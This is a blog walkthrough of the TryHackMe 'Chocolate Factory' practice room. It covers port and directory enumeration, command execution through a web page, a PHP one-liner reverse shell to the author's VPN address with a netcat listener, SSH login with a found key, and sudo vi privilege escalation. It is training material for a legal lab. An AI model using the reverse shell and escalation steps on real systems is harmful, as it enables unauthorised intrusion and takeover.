Open in app

Sign in

Write

Sign in

Chocolate Factory | TryHackMe

Nihir Zala
6 min readFeb 7, 2023

--

Task 1 Introduction

Welcome to Willy Wonka’s Chocolate Factory!

This room was designed so that hackers can revisit the Willy Wonka’s Chocolate Factory and meet Oompa Loompa

This is a beginner friendly room!

If you have any issues / queries you can reach us through Discord or Twitter.

( Created by AndyInfosec team for the community! )

1. Deploy the machine!

Answer: No Answer Needed

Task 2 Challenges

Let’s try with basic nmap to see open ports and use gobuster to find out open directories.

ENUMERATION

For nmap type the following command:

sudo nmap -p- -n <machine ip>

You can use -v for verbosity, -p- means will scan all the ports exist, -n/-R Never do DNS resolution/Always resolve.

Here is the output:

As you can see many ports are open. Firstly, let’s go to port no 80.

As you can see I found a login page. I inspected the source page and found a page validate.php

I got a doubt something is fishy there. Because “uname” is used in Linux. From here I know that Operating System is LINUX. So I moved on and tried to visit port 21 from terminal.

I didn’t know the username too I just randomly guess as the machine say “Welcome to Willy Wonka’s Chocolate Factory”. It was password protected. And we cannot visit ssh as we don’t have password for now. Let’s now use directory bruteforcing to find out some directories so that we can get any hint.

In terminal type the following command to directory bruteforce:

sudo gobuster dir -u http://<machine ip>/ -w /home/prowl/SecLists/Discovery/Web-Content/big.txt -x txt,php,py,sh -o dir_brute

I’m using big.txt because it is best for web content discovery. -x is used for file extention, -o is used for output.

As you can see we found a directory /home.php. Let’s visit this directory.

Okay!! This is interesting Let’s try to execute some Linux commands.

Let’s type the following commands to check if it let us execute the commands

uname -a

As you can see in the above screenshot we have something very very interesting. Now lets the type another command.

cd /home/ && ls -al

This command will let change our directory to home and then execute ls -al to list all the files.

As you can see in the /home there is two directories one is root and another one is charlie.

Now lets go to /var/www/html to see if there is something which is hidden.

As you can see there is one file which named as key_rev_key. Let’s try to read it. Type

cat key_rev_key

As you can see that it is in unreadable format and also very much complicated to execute commands from here.

GAINING ACCESS

Let’s search for some One Liner php reverse shell and try to execute from the command box. Here I found a website You can visit by clicking here

We want php reverse shell which is:

php -r '$sock=fsockopen("ip-address",port);exec("/bin/sh -i <&3 >&3 2>&3");'

Enter ip address, which is will be your vpn ip. and port can be any port

Final command is:

php -r ‘$sock=fsockopen(“10.8.116.182”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);’

On the other side start your netcat listener :

nc -nvlp 1234

Now execute the above php shell.

as you can see we got the shell but it is unstable to stable the shell type the command:

python -c ‘import pty; pty.spawn(“/bin/bash”)’

As you can see we have a stable shell let’s now roam around to find our answers.

when I cat the same file key_rev_key we found earlier in /var/www/html while executing commands on home.php page.

1. Enter the key you found!

After this I went straight to /home directory.

And you can clearly see we got many files cat teleport . It is the ssh key for charlie.

Copy the whole rsa and paste on your kali machine in a text file. I have named it as id_rsa which is on my desktop.

In New Terminal I typed the following command to convert ssh key to hash which is stable format to bruteforce. But when I used john It showed me that the key doesn’t have any password.

Then I thought may be I’m doing something wrong. So i tried again and again but after 30 minutes I understood that I can directly connect to ssh without any password.

just type the command:

sudo ssh charlie@<machine-ip> <id_rsa>

And BOOM!!! You’re in. Congratulations.

Type whoami

As you can see we’re charlie now. Let’s research and search folders to see what can we get from from here.

After some research and hours of searching the directories I found the charlie password in /var/www/html. I cat every file and at last found it in the validate.php file. As when I inspected element it was hidden.

2. What is Charlie’s password?

3. change user to charlie

Answer: No answer Needed.

After then I went to /home/charlie there I found a user.txt flag in /home/charlie directory. There I cat the user.txt file.

4. Enter The user Flag.

PRIVILEGE ESCALATION

Type sudo -l to see what can we run using sudo without password.

Now Go to GTFO Bins to see the reverse shell of vi for privilage escalation.

Copy the command for sudo as we can able to run sudo with vi.

and paste it in the ssh command line.

BOOM !!! We are root now. Let’s read the root flag.

Simply, Go to /root/ and let’s cat the root.txt flag. But after reaching here we saw a file name root.py.

Let’s run root.py using command

python root.py

He is asking for the key. And you know we found the key earlier in the beginning. Enter the key.

5. Enter the root flag.

AND CHEES !!! WE’VE SUCCESSFULLY OWN THE USER

Tryhackme
Tryhackme Walkthrough
Ctf Writeup
Cyber
Cybersecurity

--

--

Nihir Zala
Nihir Zala

Written by Nihir Zala

38 Followers
1 Following

Hi there, I'm Nihir Zala—a Laravel developer from Gujrat, India, with over 2.5 years of professional experience. I also learning Penetesting from THM and HTB.

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams